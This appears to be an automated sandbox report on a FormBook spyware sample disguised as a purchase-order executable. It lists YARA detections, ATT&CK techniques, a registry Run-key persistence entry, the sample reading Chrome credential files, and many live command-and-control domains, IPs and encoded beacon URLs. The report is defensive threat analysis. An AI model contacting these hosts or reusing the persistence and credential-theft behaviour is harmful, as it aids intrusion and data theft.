Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.jaxdij.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.jaxdij.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.821380016.0000000000500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.417309274.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.417458366.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.822152428.0000000004480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.383481318.000000001091F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.821985368.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Shared Modules	1 Registry Run Keys / Startup Folder	512 Process Injection	1 Deobfuscate/Decode Files or Information	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	3 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 Registry Run Keys / Startup Folder	2 Obfuscated Files or Information	21 Input Capture	2 File and Directory Discovery	Remote Desktop Protocol	1 Data from Local System	Exfiltration Over Bluetooth	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Masquerading	Security Account Manager	15 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	Automated Exfiltration	4 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	2 Virtualization/Sandbox Evasion	NTDS	131 Security Software Discovery	Distributed Component Object Model	21 Input Capture	Scheduled Transfer	114 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	512 Process Injection	LSA Secrets	2 Virtualization/Sandbox Evasion	SSH	2 Clipboard Data	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Rundll32	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
New PO-RJ-IN-003 - Knauf Queimados.exe	28%	ReversingLabs	Win32.Trojan.Jaik
New PO-RJ-IN-003 - Knauf Queimados.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\jaxdij.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\jaxdij.exe	12%	ReversingLabs
C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exe	12%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.0.New PO-RJ-IN-003 - Knauf Queimados.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1223491	Download File
2.2.jaxdij.exe.400000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.New PO-RJ-IN-003 - Knauf Queimados.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1223491	Download File
2.0.jaxdij.exe.400000.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.2.jaxdij.exe.600000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.spirituallyzen.com/m9ae/	0%	Avira URL Cloud	safe
http://www.tobewell.store/m9ae/	0%	Avira URL Cloud	safe
http://www.spirituallyzen.com/m9ae/?F6z4=4ec4fK6CMrtHuja3pViXkl8dlfKAbA0cl+B6ZD+yu2XjTt2h0hV8coMCjgRVKURuW2bGAgNBkAmkGWEjBIBjWi0t+MmK3uNJiA==&mN6Hg=kRq8Chx0sXs4Nnu0	0%	Avira URL Cloud	safe
http://www.amspustaka.com/m9ae/?F6z4=qV5DC7gvSDrvRRGewn1q/I/EwjqoLGbs6Pm0OHOL9iW03iXh+4kaxlrb2hUer6xMCUxzC2FjXkfJjvQV3jFRWlDNN37fVrd03A==&mN6Hg=kRq8Chx0sXs4Nnu0	0%	Avira URL Cloud	safe
http://www.oonrreward.xyz	0%	Avira URL Cloud	safe
http://www.frwqc.com/m9ae/?F6z4=pynBU+gmcVJLvmAk24XYTH3CuEH61wNq2RizpB0aNcQM45kGiq+MbQwB99t5gTqC+tvIVg5qQAlCnSYFpOBmFRnmyN3XSGsj5w==&mN6Hg=kRq8Chx0sXs4Nnu0	0%	Avira URL Cloud	safe
http://www.lee-perez.com/m9ae/?F6z4=nJLDtYwD0af/ePmsJ0ZKjiSVJI8rGVPKc+UQspc6K5yuMKQDKTWfrb6tVbro5/Rq1DJ6W8y/y+8M88qCUODrzxtLw2C30JMyEA==&mN6Hg=kRq8Chx0sXs4Nnu0	0%	Avira URL Cloud	safe
http://www.bookmygennie.com/m9ae/	0%	Avira URL Cloud	safe
http://www.ybkos.link/m9ae/	0%	Avira URL Cloud	safe
http://www.tobewell.store/m9ae/?F6z4=IYAlNlE+FJHaxy8xKQwy2r7+8XL3SaTnyfpqtFACBxvA1+IYQm/X+/KTYzdsJPpQzBa/f1IulPzZtkKHtHHlpgqy4oXa9op1jw==&mN6Hg=kRq8Chx0sXs4Nnu0	0%	Avira URL Cloud	safe
http://www.amspustaka.com/m9ae/	0%	Avira URL Cloud	safe
http://www.new-thinking.digital/m9ae/?F6z4=yeGgPnkUyrtnR7ayT+iAJkQi5P+hLqfzRu7/UIGlFriReHTN1+d7DIiWZVVmKJ4cvvB3dwEDWmLuBMYDpMvfxEUSQC8X9wPCmA==&mN6Hg=kRq8Chx0sXs4Nnu0	0%	Avira URL Cloud	safe
http://www.700544.com/m9ae/	0%	Avira URL Cloud	safe
http://www.lee-perez.com/m9ae/	0%	Avira URL Cloud	safe
http://www.frwqc.com/m9ae/	0%	Avira URL Cloud	safe
http://www.bookmygennie.com/m9ae/?F6z4=6mtkb9sgLdU5EKgBox+sPzjX7gz7/N2rxrRH87049IJ0dh9Tn6WPD5ftVfyzJnBGA3PJpfJHiW/BJrwPQwZWSWvRAWejN4CLLw==&mN6Hg=kRq8Chx0sXs4Nnu0	0%	Avira URL Cloud	safe
http://oonrreward.xyz/m9ae/?F6z4=LevhYPqdwsQo7WECD6x58K9v32wKr9jEH/unqFqLIkFUX6m7L7	0%	Avira URL Cloud	safe
www.spirituallyzen.com/m9ae/	0%	Avira URL Cloud	safe
http://www.publickit.website/m9ae/?F6z4=XxObD+bozu8R8o86HZokIAwRDcTSUgt1X0zVs8jY2xx2j7amGX2Nanqc4HjuSpD/F/TSiqNoyiNwTcXhTU7ob6qQALfoq6EoqQ==&mN6Hg=kRq8Chx0sXs4Nnu0	0%	Avira URL Cloud	safe
http://www.tommy57.shop/m9ae/?F6z4=SKemUsRCc/T/1VtJMmoBZUTfzvZVAKOrpHPFHv5bIcLS1NPOIJ3jWavklE8DT12a+oeWOwZfdDSidPGYCemgiB/muCJBu0rQaA==&mN6Hg=kRq8Chx0sXs4Nnu0	0%	Avira URL Cloud	safe
http://www.dailyheraldresearch.com/m9ae/?F6z4=q+GqSbkO5kqO+W9u2R8uyv/azK/Tyw9Ktq6EIVL87IABA33EfP0KANVapKUQlEGAPHMNZ2Czo2C9EtWkfzzg2b9ydKIDbcUulA==&mN6Hg=kRq8Chx0sXs4Nnu0	0%	Avira URL Cloud	safe
http://www.porggiret.site/m9ae/?F6z4=la9UBuDbTkNYLSjTdKhHvd+t7tYwPiF7FtZOQELnOBzejFZlEJsWuQ55NoeYz7TqoHjnmCP3NdRIHdLBoOXytpXMXLmthCtowg==&mN6Hg=kRq8Chx0sXs4Nnu0	0%	Avira URL Cloud	safe
http://www.oonrreward.xyz/m9ae/?F6z4=LevhYPqdwsQo7WECD6x58K9v32wKr9jEH/unqFqLIkFUX6m7L7+nio4XOLlDaWup3nHmZdjhK28JVchKAobJnM2R7Dp3tDlOSA==&mN6Hg=kRq8Chx0sXs4Nnu0	0%	Avira URL Cloud	safe
http://www.dailyheraldresearch.com/m9ae/	0%	Avira URL Cloud	safe
http://www.porggiret.site/m9ae/	0%	Avira URL Cloud	safe
http://www.ybkos.link/m9ae/?F6z4=19Acn/cRxsS2hMIvbksqz2Fo9/tvE3PmoTWmDY67F7eOm0DJL1plqZyOKvwSm3g2XK4MIkQK6hC8KTphNB2J9vZOQC2YpVwH6g==&mN6Hg=kRq8Chx0sXs4Nnu0	0%	Avira URL Cloud	safe
http://www.gmrsnodes.com/m9ae/	0%	Avira URL Cloud	safe
http://www.gmrsnodes.com/m9ae/?F6z4=mwF44ViOu9spAX9yiKWO/GCmf5D0pm7R930/p+8373gvxGpTfL4o/Lm9AHizqU6H72eF1eWgDLpzZ2SfuF6Kyw289k0D2VxhyA==&mN6Hg=kRq8Chx0sXs4Nnu0	0%	Avira URL Cloud	safe
http://www.700544.com/m9ae/?F6z4=Mu7XrmbNuBpRkVuoTBGU/iHqS/OhVA7Any/uXbqYT12baRfdD/rxJiFT6KJrK4J1cV2pSA20UCfshAzQrgjlnBPfig9iswk20g==&mN6Hg=kRq8Chx0sXs4Nnu0	0%	Avira URL Cloud	safe
http://www.new-thinking.digital/m9ae/	0%	Avira URL Cloud	safe
http://www.publickit.website/m9ae/	0%	Avira URL Cloud	safe
http://www.tommy57.shop/m9ae/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.porggiret.site	198.54.121.81	true	true	unknown
www.dailyheraldresearch.com	172.67.214.243	true	true	unknown
www.ybkos.link	107.148.15.81	true	true	unknown
tobewell.store	178.208.83.20	true	true	unknown
www.tommy57.shop	74.208.236.65	true	true	unknown
www.bookmygennie.com	38.163.214.169	true	true	unknown
www.new-thinking.digital	62.233.121.61	true	true	unknown
www.oonrreward.xyz	188.114.97.3	true	true	unknown
pp.3105.net	93.179.127.27	true	true	unknown
gmrsnodes.com	192.185.90.105	true	true	unknown
www.frwqc.com	38.40.166.195	true	true	unknown
amspustaka.com	23.111.12.177	true	true	unknown
www.spirituallyzen.com	74.208.236.214	true	true	unknown
publickit.website	206.83.40.92	true	true	unknown
www.lee-perez.com	216.40.34.41	true	true	unknown
www.publickit.website	unknown	unknown	true	unknown
www.davidemarone.com	unknown	unknown	true	unknown
www.gmrsnodes.com	unknown	unknown	true	unknown
www.tobewell.store	unknown	unknown	true	unknown
www.700544.com	unknown	unknown	true	unknown
www.amspustaka.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.amspustaka.com/m9ae/?F6z4=qV5DC7gvSDrvRRGewn1q/I/EwjqoLGbs6Pm0OHOL9iW03iXh+4kaxlrb2hUer6xMCUxzC2FjXkfJjvQV3jFRWlDNN37fVrd03A==&mN6Hg=kRq8Chx0sXs4Nnu0	true	Avira URL Cloud: safe	unknown
www.spirituallyzen.com/m9ae/	true	Avira URL Cloud: safe	low
http://www.frwqc.com/m9ae/?F6z4=pynBU+gmcVJLvmAk24XYTH3CuEH61wNq2RizpB0aNcQM45kGiq+MbQwB99t5gTqC+tvIVg5qQAlCnSYFpOBmFRnmyN3XSGsj5w==&mN6Hg=kRq8Chx0sXs4Nnu0	true	Avira URL Cloud: safe	unknown
http://www.tobewell.store/m9ae/	true	Avira URL Cloud: safe	unknown
http://www.lee-perez.com/m9ae/?F6z4=nJLDtYwD0af/ePmsJ0ZKjiSVJI8rGVPKc+UQspc6K5yuMKQDKTWfrb6tVbro5/Rq1DJ6W8y/y+8M88qCUODrzxtLw2C30JMyEA==&mN6Hg=kRq8Chx0sXs4Nnu0	true	Avira URL Cloud: safe	unknown
http://www.ybkos.link/m9ae/	true	Avira URL Cloud: safe	unknown
http://www.bookmygennie.com/m9ae/	true	Avira URL Cloud: safe	unknown
http://www.spirituallyzen.com/m9ae/	true	Avira URL Cloud: safe	unknown
http://www.spirituallyzen.com/m9ae/?F6z4=4ec4fK6CMrtHuja3pViXkl8dlfKAbA0cl+B6ZD+yu2XjTt2h0hV8coMCjgRVKURuW2bGAgNBkAmkGWEjBIBjWi0t+MmK3uNJiA==&mN6Hg=kRq8Chx0sXs4Nnu0	true	Avira URL Cloud: safe	unknown
http://www.amspustaka.com/m9ae/	true	Avira URL Cloud: safe	unknown
http://www.tobewell.store/m9ae/?F6z4=IYAlNlE+FJHaxy8xKQwy2r7+8XL3SaTnyfpqtFACBxvA1+IYQm/X+/KTYzdsJPpQzBa/f1IulPzZtkKHtHHlpgqy4oXa9op1jw==&mN6Hg=kRq8Chx0sXs4Nnu0	true	Avira URL Cloud: safe	unknown
http://www.lee-perez.com/m9ae/	true	Avira URL Cloud: safe	unknown
http://www.700544.com/m9ae/	true	Avira URL Cloud: safe	unknown
http://www.new-thinking.digital/m9ae/?F6z4=yeGgPnkUyrtnR7ayT+iAJkQi5P+hLqfzRu7/UIGlFriReHTN1+d7DIiWZVVmKJ4cvvB3dwEDWmLuBMYDpMvfxEUSQC8X9wPCmA==&mN6Hg=kRq8Chx0sXs4Nnu0	true	Avira URL Cloud: safe	unknown
http://www.bookmygennie.com/m9ae/?F6z4=6mtkb9sgLdU5EKgBox+sPzjX7gz7/N2rxrRH87049IJ0dh9Tn6WPD5ftVfyzJnBGA3PJpfJHiW/BJrwPQwZWSWvRAWejN4CLLw==&mN6Hg=kRq8Chx0sXs4Nnu0	true	Avira URL Cloud: safe	unknown
http://www.frwqc.com/m9ae/	true	Avira URL Cloud: safe	unknown
http://www.publickit.website/m9ae/?F6z4=XxObD+bozu8R8o86HZokIAwRDcTSUgt1X0zVs8jY2xx2j7amGX2Nanqc4HjuSpD/F/TSiqNoyiNwTcXhTU7ob6qQALfoq6EoqQ==&mN6Hg=kRq8Chx0sXs4Nnu0	true	Avira URL Cloud: safe	unknown
http://www.tommy57.shop/m9ae/?F6z4=SKemUsRCc/T/1VtJMmoBZUTfzvZVAKOrpHPFHv5bIcLS1NPOIJ3jWavklE8DT12a+oeWOwZfdDSidPGYCemgiB/muCJBu0rQaA==&mN6Hg=kRq8Chx0sXs4Nnu0	true	Avira URL Cloud: safe	unknown
http://www.dailyheraldresearch.com/m9ae/?F6z4=q+GqSbkO5kqO+W9u2R8uyv/azK/Tyw9Ktq6EIVL87IABA33EfP0KANVapKUQlEGAPHMNZ2Czo2C9EtWkfzzg2b9ydKIDbcUulA==&mN6Hg=kRq8Chx0sXs4Nnu0	true	Avira URL Cloud: safe	unknown
http://www.dailyheraldresearch.com/m9ae/	true	Avira URL Cloud: safe	unknown
http://www.porggiret.site/m9ae/?F6z4=la9UBuDbTkNYLSjTdKhHvd+t7tYwPiF7FtZOQELnOBzejFZlEJsWuQ55NoeYz7TqoHjnmCP3NdRIHdLBoOXytpXMXLmthCtowg==&mN6Hg=kRq8Chx0sXs4Nnu0	true	Avira URL Cloud: safe	unknown
http://www.oonrreward.xyz/m9ae/?F6z4=LevhYPqdwsQo7WECD6x58K9v32wKr9jEH/unqFqLIkFUX6m7L7+nio4XOLlDaWup3nHmZdjhK28JVchKAobJnM2R7Dp3tDlOSA==&mN6Hg=kRq8Chx0sXs4Nnu0	true	Avira URL Cloud: safe	unknown
http://www.ybkos.link/m9ae/?F6z4=19Acn/cRxsS2hMIvbksqz2Fo9/tvE3PmoTWmDY67F7eOm0DJL1plqZyOKvwSm3g2XK4MIkQK6hC8KTphNB2J9vZOQC2YpVwH6g==&mN6Hg=kRq8Chx0sXs4Nnu0	true	Avira URL Cloud: safe	unknown
http://www.porggiret.site/m9ae/	true	Avira URL Cloud: safe	unknown
http://www.gmrsnodes.com/m9ae/	true	Avira URL Cloud: safe	unknown
http://www.gmrsnodes.com/m9ae/?F6z4=mwF44ViOu9spAX9yiKWO/GCmf5D0pm7R930/p+8373gvxGpTfL4o/Lm9AHizqU6H72eF1eWgDLpzZ2SfuF6Kyw289k0D2VxhyA==&mN6Hg=kRq8Chx0sXs4Nnu0	true	Avira URL Cloud: safe	unknown
http://www.700544.com/m9ae/?F6z4=Mu7XrmbNuBpRkVuoTBGU/iHqS/OhVA7Any/uXbqYT12baRfdD/rxJiFT6KJrK4J1cV2pSA20UCfshAzQrgjlnBPfig9iswk20g==&mN6Hg=kRq8Chx0sXs4Nnu0	true	Avira URL Cloud: safe	unknown
http://www.new-thinking.digital/m9ae/	true	Avira URL Cloud: safe	unknown
http://www.publickit.website/m9ae/	true	Avira URL Cloud: safe	unknown
http://www.tommy57.shop/m9ae/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	rundll32.exe, 0000000B.00000003.485044441.0000000007231000.00000004.00000800.00020000.00000000.sdmp, 456b6ELMQ.11.dr	false		high
https://duckduckgo.com/ac/?q=	456b6ELMQ.11.dr	false		high
https://www.instagram.com/hover_domains	rundll32.exe, 0000000B.00000002.823746464.000000000540E000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.824795992.0000000006FA0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://supportservices.easyspace.com/	rundll32.exe, 0000000B.00000002.824187605.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp	false		high
https://controlpanel.easyspace.com/	rundll32.exe, 0000000B.00000002.824187605.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp	false		high
https://search.yahoo.com?fr=crmas_sfpf	rundll32.exe, 0000000B.00000003.485044441.0000000007231000.00000004.00000800.00020000.00000000.sdmp, 456b6ELMQ.11.dr	false		high
https://www.easyspace.com/assets/images/structure/easyspace-logo-main.svg	rundll32.exe, 0000000B.00000002.824187605.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp	false		high
https://www.hover.com/email?source=parked	rundll32.exe, 0000000B.00000002.823746464.000000000540E000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.824795992.0000000006FA0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.hover.com/about?source=parked	rundll32.exe, 0000000B.00000002.823746464.000000000540E000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.824795992.0000000006FA0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.oonrreward.xyz	rundll32.exe, 0000000B.00000002.823508673.0000000004DC6000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.hover.com/domains/results	rundll32.exe, 0000000B.00000002.823746464.000000000540E000.00000004.10000000.00040000.00000000.sdmp	false		high
http://oonrreward.xyz/m9ae/?F6z4=LevhYPqdwsQo7WECD6x58K9v32wKr9jEH/unqFqLIkFUX6m7L7	rundll32.exe, 0000000B.00000002.823508673.0000000004DC6000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.hover.com/tools?source=parked	rundll32.exe, 0000000B.00000002.823746464.000000000540E000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.824795992.0000000006FA0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://help.hover.com/home?source=parked	rundll32.exe, 0000000B.00000002.823746464.000000000540E000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.824795992.0000000006FA0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://code.jquery.com/jquery-3.3.1.min.js	rundll32.exe, 0000000B.00000002.823538055.0000000004F58000.00000004.10000000.00040000.00000000.sdmp	false		high
https://www.hover.com/domain_pricing?source=parked	rundll32.exe, 0000000B.00000002.823746464.000000000540E000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.824795992.0000000006FA0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.hover.com/privacy?source=parked	rundll32.exe, 0000000B.00000002.823746464.000000000540E000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.824795992.0000000006FA0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000003.00000000.313546436.0000000000921000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.391112959.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.361885332.000000000091F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://twitter.com/hover	rundll32.exe, 0000000B.00000002.823746464.000000000540E000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.824795992.0000000006FA0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	rundll32.exe, 0000000B.00000003.485044441.0000000007231000.00000004.00000800.00020000.00000000.sdmp, 456b6ELMQ.11.dr	false		high
https://www.hover.com/transfer_in?source=parked	rundll32.exe, 0000000B.00000002.823746464.000000000540E000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.824795992.0000000006FA0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.easyspace.com/	rundll32.exe, 0000000B.00000002.824187605.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp	false		high
https://www.hover.com/renew?source=parked	rundll32.exe, 0000000B.00000002.823746464.000000000540E000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.824795992.0000000006FA0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css	rundll32.exe, 0000000B.00000002.824187605.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	456b6ELMQ.11.dr	false		high
https://mchost.ru/	rundll32.exe, 0000000B.00000002.824085555.0000000005BE8000.00000004.10000000.00040000.00000000.sdmp	false		high
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	rundll32.exe, 0000000B.00000003.485044441.0000000007231000.00000004.00000800.00020000.00000000.sdmp, 456b6ELMQ.11.dr	false		high
http://nsis.sf.net/NSIS_ErrorError	New PO-RJ-IN-003 - Knauf Queimados.exe	false		high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=	rundll32.exe, 0000000B.00000003.485044441.0000000007231000.00000004.00000800.00020000.00000000.sdmp, 456b6ELMQ.11.dr	false		high
http://gmpg.org/xfn/11	rundll32.exe, 0000000B.00000002.823538055.0000000004F58000.00000004.10000000.00040000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	456b6ELMQ.11.dr	false		high
https://search.yahoo.com?fr=crmas_sfp	rundll32.exe, 0000000B.00000003.485044441.0000000007231000.00000004.00000800.00020000.00000000.sdmp, 456b6ELMQ.11.dr	false		high
http://nsis.sf.net/NSIS_Error	New PO-RJ-IN-003 - Knauf Queimados.exe	false		high
https://www.hover.com/tos?source=parked	rundll32.exe, 0000000B.00000002.823746464.000000000540E000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.824795992.0000000006FA0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	456b6ELMQ.11.dr	false		high
https://www.hover.com/?source=parked	rundll32.exe, 0000000B.00000002.823746464.000000000540E000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.824795992.0000000006FA0000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
206.83.40.92	publickit.website	Canada	207083	HOSTSLIM-GLOBAL-NETWORKNL	true
107.148.15.81	www.ybkos.link	United States	54600	PEGTECHINCUS	true
74.208.236.65	www.tommy57.shop	United States	8560	ONEANDONE-ASBrauerstrasse48DE	true
93.179.127.27	pp.3105.net	Canada	25820	IT7NETCA	true
23.111.12.177	amspustaka.com	Singapore	33438	HIGHWINDS2US	true
74.208.236.214	www.spirituallyzen.com	United States	8560	ONEANDONE-ASBrauerstrasse48DE	true
38.40.166.195	www.frwqc.com	United States	174	COGENT-174US	true
192.185.90.105	gmrsnodes.com	United States	46606	UNIFIEDLAYER-AS-1US	true
62.233.121.61	www.new-thinking.digital	United Kingdom	20860	IOMART-ASGB	true
188.114.97.3	www.oonrreward.xyz	European Union	13335	CLOUDFLARENETUS	true
178.208.83.20	tobewell.store	Russian Federation	48282	VDSINA-ASRU	true
38.163.214.169	www.bookmygennie.com	United States	174	COGENT-174US	true
172.67.214.243	www.dailyheraldresearch.com	United States	13335	CLOUDFLARENETUS	true
216.40.34.41	www.lee-perez.com	Canada	15348	TUCOWSCA	true
198.54.121.81	www.porggiret.site	United States	22612	NAMECHEAP-NETUS	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	755933
Start date and time:	2022-11-29 10:32:08 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 20s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	New PO-RJ-IN-003 - Knauf Queimados.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@11/14@19/15
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 72.4% (good quality ratio 62.7%) Quality average: 70.8% Quality standard deviation: 35.9%
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
HTTP Packets have been reduced
TCP Packets have been reduced to 100
Excluded IPs from analysis (whitelisted): 20.189.173.22, 20.189.173.21
Excluded domains from analysis (whitelisted): client.wns.windows.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, watson.telemetry.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:33:07	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run aekkvxebyca C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exe "C:\Users\user\AppData\Local\Temp\jaxdij.exe" C:\Users\user\AppData\L
10:33:15	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run aekkvxebyca C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exe "C:\Users\user\AppData\Local\Temp\jaxdij.exe" C:\Users\user\AppData\L
10:33:24	API Interceptor	2x Sleep call for process: WerFault.exe modified

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rubthqnwyfue.exe_1078f5d9a12c4fe091b0b1b063f9270e1879244_c652c34e_0b3f82dd\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8402962355282704
Encrypted:	false
SSDEEP:	96:G2F7LbmubhHJ76f5pXIQcQvc6QcEDMcw3DD+HbHg/EFAeugtYsaV9w72n2/AopgQ:BBOLHBUZMXgjzxq/u7sdS274It0
MD5:	6483B1F032E7C7A2064F3902C60460C5
SHA1:	308780D73090910FB14EFD18F7EC0F579D5F6AC8
SHA-256:	309CD45651DC1A312A62DB06F88BC948F67A9BEF2B132F7EB2C3F24D9312A71C
